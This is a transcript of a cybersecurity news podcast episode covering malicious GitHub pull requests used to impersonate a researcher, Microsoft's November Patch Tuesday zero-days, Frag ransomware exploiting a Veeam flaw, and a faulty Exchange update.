This episode of Cyber Security Today is brought to you by CDW Canada Tech Talks. If you’re passionate about technology and innovation, this is the podcast for you.
Join host KJ Burke, as he and industry experts dive into the latest trends, insights, and strategies shaping the tech landscape in Canada. Visit cdw.ca/tech talks to tune in today. There’s a link in the show note
GitHub Projects Targeted with Malicious Commits in Smear Campaign Against Researcher, Microsoft Confirms Four Zero-Days in November Patch Tuesday: Windows Users Must Update Now, New Ransomware targets Veeam Backup Software and Microsoft Exchange Update Fixes Security Flaws, Disrupts Mail Transport Rules
This is Cyber Security Today. I’m your host, Jim Love.
GitHub Projects Targeted with Malicious Commits in Smear Campaign Against Researcher
Multiple GitHub projects have been targeted with malicious code commits and pull requests, seemingly aiming to inject backdoors into open-source repositories. The attack recently came to light when EXO Labs, an AI and machine learning startup, flagged an “innocent-looking” pull request attempting to compromise its codebase.
The pull request modified a Python file, embedding a sequence of Unicode numbers that, when decoded, formed a script to download and execute a remote payload from “evildojo[.]com.” If merged, this code could have created a functional backdoor, allowing remote code execution on users’ systems. However, the payload URL never hosted any content, suggesting the intent was more complex than a direct cyberattack.
The pull request originated from the now-deleted GitHub account “evildojo666,” which impersonated Texas-based security researcher Mike Bell. Bell has denied involvement, stating, “There was never any payload…this is a smear campaign.” A second impersonator account, “darkimage666,” has also been linked to similar malicious activity. Both accounts have since been removed.
The evidence suggests a coordinated effort to frame Bell, as anyone can create a GitHub account using another person’s details and submit pull requests under their name. The absence of a payload at the linked URL further supports the theory that this was a reputation attack.
This wasn’t an isolated incident. At least 18 similar pull requests were identified across open-source projects, including “yt-dlp,” a popular video downloader. Many accounts linked to these attacks have been traced to Indonesia-based actors, according to threat intelligence reports.
The malicious commits were caught early by vigilant project maintainers and automated tools like Presubmit’s AI Reviewer, which flagged the EXO Labs pull request with a “critical security” alert. These tools, powered by GitHub Actions, are increasingly vital in defending against such threats in open-source supply chains.
While the attack was thwarted, it underscores the risks of supply chain vulnerabilities in open-source software. It also highlights the ease with which impersonation can occur in online ecosystems, leaving individuals and projects exposed to reputational and security risks.
This incident follows other high-profile attacks on open-source projects, demonstrating the ongoing need for robust code review processes and vigilance against malicious activity.
Microsoft Confirms Four Zero-Days in November Patch Tuesday: Windows Users Must Update Now
Microsoft has disclosed over 90 security issues in its November Patch Tuesday release, including four zero-day vulnerabilities, two of which are actively exploited. These vulnerabilities impact multiple Microsoft products, including Windows, Office, and Exchange Server. Immediate updates are recommended to mitigate potential risks.
Key Zero-Day Vulnerabilities:
- CVE-2024-43451: NTLM Hash Disclosure Spoofing
This vulnerability exposes NT LAN Manager (NTLM) authentication hashes, potentially allowing attackers to authenticate as users. Exploitation requires user interaction, such as opening a malicious file delivered via phishing.
- CVE-2024-49039: Windows Task Scheduler Elevation of Privilege
Attackers could exploit this vulnerability to gain elevated privileges on a compromised system by using Remote Procedure Call (RPC) functions. Exploitation requires access to the target system and the ability to run a malicious application.
Critical-Rated Vulnerabilities:
Two additional vulnerabilities scored 9.8 out of 10 on the Common Vulnerability Scoring System (CVSS):
- CVE-2024-43498: A .NET vulnerability that allows unauthenticated remote attackers to target .NET web apps.
- CVE-2024-43639: A Windows Kerberos vulnerability enabling code execution by unauthenticated attackers.
“These vulnerabilities indicate high impact,” Tyler Reguly, a security expert at Fortra, warned. Exploitation could lead to significant system compromise, making prompt updates essential.
Affected Products:
The vulnerabilities impact:
- Windows OS (10, 11)
- Microsoft Office
- Exchange Server
- .NET
- Visual Studio
- SQL Server
What to Do:
Security experts emphasize that updating Windows systems and Microsoft software immediately is the best defense. “Patch now to resolve both known and exploited vulnerabilities,” said Chris Goettl, VP of Security Product Management at Ivanti. Organizations running Exchange Server should also prioritize updates to protect critical infrastructure.
New Ransomware Variant Exploits Critical Veeam Backup Vulnerability
A critical vulnerability in Veeam Backup and Replication software, with a CVSS score of 9.8, is being actively exploited by a new ransomware variant called Frag, according to a report from Sophos X-Ops. This marks the latest in a series of attacks targeting the same flaw, following similar campaigns by the Akira and Fog threat groups.
Attackers gain initial access through a compromised VPN appliance and then exploit the Veeam vulnerability to infiltrate systems. They create new administrator accounts to establish persistence—recent incidents have seen accounts named “point” and “point2” being set up by attackers.
Frag employs tactics, techniques, and procedures (TTPs) consistent with Akira and Fog ransomware groups, indicating a possible overlap or shared playbook among these operators.
The CVE, unpatched in some environments, offers attackers significant control, enabling data exfiltration and ransomware deployment with ease.
Growing Risk:
The continued exploitation of this Veeam vulnerability highlights the increasing danger for organizations relying on unpatched or outdated backup systems. Ransomware groups are intensifying their efforts, and the proliferation of similar TTPs suggests the vulnerability remains a high-value target.
Experts are recommending:
- Patch Immediately: Ensure the Veeam Backup and Replication software is updated with the latest security patches.
- Audit Access: Review VPN and remote access configurations to detect unauthorized accounts like “point” or “point2.”
- Monitor for Threat Indicators: Watch for signs of compromise, including suspicious admin account activity or unusual file access.
Microsoft Exchange Update Fixes Security Flaws, Disrupts Mail Transport Rules
And as much as everyone recommends early patching of systems, Microsoft has paused the rollout of its November 2024 Exchange Server security update after discovering it disrupts transport rules, a feature critical to email compliance and flow. The update, designed to address vulnerabilities in Exchange Server, caused issues for hybrid and on-premises setups, leaving some organizations with interrupted email delivery.
The update led to periodic failures of transport rules and Data Loss Protection (DLP) policies for some customers. In worst-case scenarios, email flow stopped altogether. Organizations without transport or DLP rules appear unaffected and can continue using the update.
Transport rules are essential for inspecting emails in transit, enforcing compliance, and managing exceptions before delivery. These rules are widely used for tasks such as inspecting attachments or adding disclaimers to emails. Failures caused by the update rendered these functions unreliable or completely inoperative.
After customer complaints surfaced on social media and forums, Microsoft pulled the update on November 14. For affected users, the company recommends uninstalling the patch and waiting for a revised version.
While Microsoft acted quickly to pause the rollout, the incident raises questions about its testing processes. Exchange Server remains a key target for cyberattacks, and maintaining security through updates is critical. However, breaking a core function like mail flow risks significant disruption for businesses.
But in a world where early patching is not a luxury, it’s a necessity, it’s hard to blame organizations for not patching quickly if the patches are going to break key areas of their systems and operations.
And that’s our show for today.
Thanks to our sponsor, CDW and KJ Burke’s CDW Canada Tech Talks. Check it out if you get the chance. You can find it like us on Spotify, Apple or wherever you get your podcasts.
Reach me at editorial@technewsday.ca
I’m your host Jim Love, thanks for listening.